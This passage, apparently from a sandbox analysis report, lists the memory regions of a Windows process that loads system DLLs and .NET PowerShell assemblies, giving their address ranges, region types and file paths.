"c:\\windows\\system32\\cfgmgr32.dll") Region: id = 844 start_va = 0x7fffedee0000 end_va = 0x7fffedf31fff monitored = 0 entry_point = 0x7fffedeef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 845 start_va = 0x7fffed810000 end_va = 0x7fffed8c4fff monitored = 0 entry_point = 0x7fffed8522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 846 start_va = 0x7fffecde0000 end_va = 0x7fffece2afff monitored = 0 entry_point = 0x7fffecde35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 847 start_va = 0x7fffecdc0000 end_va = 0x7fffecdd3fff monitored = 0 entry_point = 0x7fffecdc52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 848 start_va = 0x7fffee060000 end_va = 0x7fffef5befff monitored = 0 entry_point = 0x7fffee1c11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 849 start_va = 0x7fffec520000 end_va = 0x7fffec53efff monitored = 0 entry_point = 0x7fffec525d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 850 start_va = 0x25b59a20000 end_va = 0x25b59a20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a20000" filename = "" Region: id = 851 start_va = 0x25b5b430000 end_va = 0x25b5b766fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 852 start_va = 0x7fffeb310000 end_va = 0x7fffeb495fff monitored = 0 entry_point = 0x7fffeb35d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 853 start_va = 0x25b59a30000 end_va = 0x25b59a33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 854 start_va = 0x25b59a40000 end_va = 0x25b59a54fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 855 start_va = 0x25b59a60000 end_va = 0x25b59a60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a60000" filename = "" Region: id = 856 start_va = 0x653df60000 end_va = 0x653dfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653df60000" filename = "" Region: id = 857 start_va = 0x25b59a30000 end_va = 0x25b59a33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 858 start_va = 0x25b59a70000 end_va = 0x25b59a88fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000001e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001e.db") Region: id = 859 start_va = 0x7fffeb190000 end_va = 0x7fffeb1f6fff monitored = 0 entry_point = 0x7fffeb1ae710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 860 start_va = 0x25b59a90000 end_va = 0x25b59a93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 861 start_va = 0x7fffe2470000 end_va = 0x7fffe247cfff monitored = 0 entry_point = 0x7fffe2471ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 862 start_va = 0x653e200000 end_va = 0x653e27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e200000" filename = "" Region: id = 864 start_va = 0x25b5b240000 end_va = 0x25b5b31cfff monitored = 0 entry_point = 0x25b5b29e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 865 start_va = 0x25b5b420000 end_va = 0x25b5b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b420000" filename = "" Region: id = 866 start_va = 0x653e280000 end_va = 0x653e2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e280000" filename = "" Region: id = 867 start_va = 0x25b59a30000 end_va = 0x25b59a33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 868 start_va = 0x25b59ab0000 end_va = 0x25b59af4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 869 start_va = 0x25b59a70000 end_va = 0x25b59a73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 870 start_va = 0x25b5b240000 end_va = 0x25b5b2cdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 871 start_va = 0x7fffe2590000 end_va = 0x7fffe266afff monitored = 0 entry_point = 0x7fffe25a28b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 872 start_va = 0x7fffecaa0000 end_va = 0x7fffecaccfff monitored = 0 entry_point = 0x7fffecab9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 873 start_va = 0x7fffe2560000 end_va = 0x7fffe2585fff monitored = 0 entry_point = 0x7fffe2561cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 874 start_va = 0x7fffe4f60000 end_va = 0x7fffe4f71fff monitored = 0 entry_point = 0x7fffe4f63580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 875 start_va = 0x7fffec740000 end_va = 0x7fffec756fff monitored = 0 entry_point = 0x7fffec7479d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 876 start_va = 0x7fffec3d0000 end_va = 0x7fffec403fff monitored = 0 entry_point = 0x7fffec3eae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 877 start_va = 0x7fffecc50000 end_va = 0x7fffecc78fff monitored = 0 entry_point = 0x7fffecc64530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 878 start_va = 0x7fffec860000 end_va = 0x7fffec86afff monitored = 0 entry_point = 0x7fffec8619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 879 start_va = 0x7fffec2b0000 end_va = 0x7fffec2e0fff monitored = 0 entry_point = 0x7fffec2b7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 880 start_va = 0x25b59a80000 end_va = 0x25b59a80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a80000" filename = "" Region: id = 881 start_va = 0x7fffd90f0000 end_va = 0x7fffd918cfff monitored = 1 entry_point = 0x7fffd90f1010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 882 start_va = 0x7fffdb330000 end_va = 0x7fffdb339fff monitored = 0 entry_point = 0x7fffdb331350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 883 start_va = 0x7fffd29f0000 end_va = 0x7fffd33d5fff monitored = 1 entry_point = 0x7fffd29f5b60 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 884 start_va = 0x7fffd86a0000 end_va = 0x7fffd8796fff monitored = 0 entry_point = 0x7fffd86c4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 885 start_va = 0x25b59a00000 end_va = 0x25b59a00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a00000" filename = "" Region: id = 886 start_va = 0x25b59a80000 end_va = 0x25b59a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025b59a80000" filename = "" Region: id = 887 start_va = 0x25b59a90000 end_va = 0x25b59a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59a90000" filename = "" Region: id = 888 start_va = 0x7fff732d0000 end_va = 0x7fff732dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff732d0000" filename = "" Region: id = 889 start_va = 0x7fff732e0000 end_va = 0x7fff732effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff732e0000" filename = "" Region: id = 890 start_va = 0x7fff732f0000 end_va = 0x7fff7337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff732f0000" filename = "" Region: id = 891 start_va = 0x7fff73380000 end_va = 0x7fff733effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73380000" filename = "" Region: id = 892 start_va = 0x25b59b00000 end_va = 0x25b59b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b59b00000" filename = "" Region: id = 893 start_va = 0x25b5b2d0000 end_va = 0x25b5b2d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b2d0000" filename = "" Region: id = 894 start_va = 0x25b5b770000 end_va = 0x25b5b8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b770000" filename = "" Region: id = 895 start_va = 0x25b5b770000 end_va = 0x25b5b8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b770000" filename = "" Region: id = 896 start_va = 0x25b5b8d0000 end_va = 0x25b5b8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b8d0000" filename = "" Region: id = 897 start_va = 0x653e300000 end_va = 0x653e37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e300000" filename = "" Region: id = 898 start_va = 0x25b5b2e0000 end_va = 0x25b5b2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b2e0000" filename = "" Region: id = 899 start_va = 0x25b5b8e0000 end_va = 0x25b738dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b8e0000" filename = "" Region: id = 900 start_va = 0x25b5b2e0000 end_va = 0x25b5b34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b2e0000" filename = "" Region: id = 901 start_va = 0x25b5b770000 end_va = 0x25b5b87bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b770000" filename = "" Region: id = 902 start_va = 0x25b5b8b0000 end_va = 0x25b5b8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b8b0000" filename = "" Region: id = 903 start_va = 0x653e380000 end_va = 0x653e3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e380000" filename = "" Region: id = 904 start_va = 0x7fffd1500000 end_va = 0x7fffd29e7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f89061884b75dab0e3967d7221e5290d\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\f89061884b75dab0e3967d7221e5290d\\mscorlib.ni.dll") Region: id = 905 start_va = 0x7ff6ab710000 end_va = 0x7ff6ab7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff6ab710000" filename = "" Region: id = 906 start_va = 0x7ff6ab700000 end_va = 0x7ff6ab70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff6ab700000" filename = "" Region: id = 907 start_va = 0x25b5b350000 end_va = 0x25b5b35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b350000" filename = "" Region: id = 908 start_va = 0x25b738e0000 end_va = 0x25b73a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b738e0000" filename = "" Region: id = 909 start_va = 0x25b5b360000 end_va = 0x25b5b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b360000" filename = "" Region: id = 910 start_va = 0x7fffd08b0000 end_va = 0x7fffd14f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\60b77585c8aa9cfd1b30a64092c81041\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\60b77585c8aa9cfd1b30a64092c81041\\system.ni.dll") Region: id = 911 start_va = 0x7fffcff20000 end_va = 0x7fffd08a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\d1da4b8a843ec63bb8be25f8202bedc1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\d1da4b8a843ec63bb8be25f8202bedc1\\system.core.ni.dll") Region: id = 912 start_va = 0x7fffd8c60000 end_va = 0x7fffd8d0bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\a98ebc5c36f6700560e2c198cb74a21e\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\a98ebc5c36f6700560e2c198cb74a21e\\microsoft.powershell.consolehost.ni.dll") Region: id = 913 start_va = 0x7fff733f0000 end_va = 0x7fff7342ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff733f0000" filename = "" Region: id = 914 start_va = 0x7fff73430000 end_va = 0x7fff7343ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73430000" filename = "" Region: id = 915 start_va = 0x7fffcdf10000 end_va = 0x7fffcff1efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\c5788d802ee1c43bd2595d4bd8068373\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\c5788d802ee1c43bd2595d4bd8068373\\system.management.automation.ni.dll") Region: id = 916 start_va = 0x25b738e0000 end_va = 0x25b739dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b738e0000" filename = "" Region: id = 917 start_va = 0x25b73a20000 end_va = 0x25b73a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a20000" filename = "" Region: id = 918 start_va = 0x25b5b370000 end_va = 0x25b5b3d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 919 start_va = 0x25b5b3e0000 end_va = 0x25b5b3e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 920 start_va = 0x25b5b3f0000 end_va = 0x25b5b3fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 921 start_va = 0x7fffefc70000 end_va = 0x7fffefc77fff monitored = 0 entry_point = 0x7fffefc710b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 922 start_va = 0x7fff73440000 end_va = 0x7fff7344ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73440000" filename = "" Region: id = 923 start_va = 0x7fffeb620000 end_va = 0x7fffeb66ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\0b78453b55fd5a9dd4227b840b3c26ab\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\0b78453b55fd5a9dd4227b840b3c26ab\\system.numerics.ni.dll") Region: id = 924 start_va = 0x7fffd8600000 end_va = 0x7fffd869bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\a85ca0608e46590b3c5efc58b708c91d\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\a85ca0608e46590b3c5efc58b708c91d\\microsoft.management.infrastructure.ni.dll") Region: id = 925 start_va = 0x7fffcd660000 end_va = 0x7fffcdf05fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c2f35cb9621b8ca33a05759bbb0683c1\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c2f35cb9621b8ca33a05759bbb0683c1\\system.xml.ni.dll") Region: id = 926 start_va = 0x7fffd8490000 end_va = 0x7fffd85f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\4e86c0566600de46fccb2961b7fbe310\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\4e86c0566600de46fccb2961b7fbe310\\system.directoryservices.ni.dll") Region: id = 927 start_va = 0x7fffd8330000 end_va = 0x7fffd848efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\2b17cdd44210c6b182c3804d228caba4\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\2b17cdd44210c6b182c3804d228caba4\\system.management.ni.dll") Region: id = 928 start_va = 0x7fff73450000 end_va = 0x7fff7345ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73450000" filename = "" Region: id = 929 start_va = 0x7fff73460000 end_va = 0x7fff7346ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73460000" filename = "" Region: id = 930 start_va = 0x7fff73470000 end_va = 0x7fff7347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73470000" filename = "" Region: id = 931 start_va = 0x7fff73480000 end_va = 0x7fff7348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73480000" filename = "" Region: id = 932 start_va = 0x7fff73490000 end_va = 0x7fff7349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73490000" filename = "" Region: id = 933 start_va = 0x7fff734a0000 end_va = 0x7fff734affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff734a0000" filename = "" Region: id = 934 start_va = 0x7fff734b0000 end_va = 0x7fff734bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff734b0000" filename = "" Region: id = 935 start_va = 0x7fff734c0000 end_va = 0x7fff734cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff734c0000" filename = "" Region: id = 936 start_va = 0x7fff734d0000 end_va = 0x7fff734dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff734d0000" filename = "" Region: id = 937 start_va = 0x7fff734e0000 end_va = 0x7fff734effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff734e0000" filename = "" Region: id = 938 start_va = 0x7fff734f0000 end_va = 0x7fff734fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff734f0000" filename = "" Region: id = 939 start_va = 0x7fff73500000 end_va = 0x7fff7350ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73500000" filename = "" Region: id = 940 start_va = 0x7fff73510000 end_va = 0x7fff7351ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73510000" filename = "" Region: id = 941 start_va = 0x7fffe5150000 end_va = 0x7fffe517bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\44fe61ba9d3d7a07f59d4d61b684745f\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\44fe61ba9d3d7a07f59d4d61b684745f\\system.configuration.install.ni.dll") Region: id = 942 start_va = 0x7fffd8250000 end_va = 0x7fffd8327fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\ed6d04a18216e12e72d7813b2a427519\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\ed6d04a18216e12e72d7813b2a427519\\system.transactions.ni.dll") Region: id = 943 start_va = 0x7fffd8200000 end_va = 0x7fffd824efff monitored = 1 entry_point = 0x7fffd82201ae region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 944 start_va = 0x25b73a30000 end_va = 0x25b73a7bfff monitored = 1 entry_point = 0x25b73a501ae region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 945 start_va = 0x7fff73520000 end_va = 0x7fff7352ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73520000" filename = "" Region: id = 946 start_va = 0x7fffeb610000 end_va = 0x7fffeb614fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.diagnostics.tracing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\8076609d42bb39dd02decd6175250122\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\8076609d42bb39dd02decd6175250122\\system.diagnostics.tracing.ni.dll") Region: id = 947 start_va = 0x7fffd45e0000 end_va = 0x7fffd4701fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\2fe311002b76e58f2f89f897a32b62a2\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\2fe311002b76e58f2f89f897a32b62a2\\system.configuration.ni.dll") Region: id = 948 start_va = 0x25b5b400000 end_va = 0x25b5b400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 949 start_va = 0x25b5b400000 end_va = 0x25b5b408fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 950 start_va = 0x25b5b400000 end_va = 0x25b5b400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 951 start_va = 0x25b5b400000 end_va = 0x25b5b408fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 952 start_va = 0x25b5b400000 end_va = 0x25b5b400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 953 start_va = 0x25b5b400000 end_va = 0x25b5b408fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 954 start_va = 0x653e400000 end_va = 0x653e47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e400000" filename = "" Region: id = 955 start_va = 0x653e480000 end_va = 0x653e4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653e480000" filename = "" Region: id = 956 start_va = 0x7fff73530000 end_va = 0x7fff7353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73530000" filename = "" Region: id = 957 start_va = 0x7fffd80f0000 end_va = 0x7fffd81fdfff monitored = 1 entry_point = 0x7fffd80f1080 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 958 start_va = 0x25b5b400000 end_va = 0x25b5b40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b5b400000" filename = "" Region: id = 959 start_va = 0x25b5b410000 end_va = 0x25b5b41ffff monitored = 1 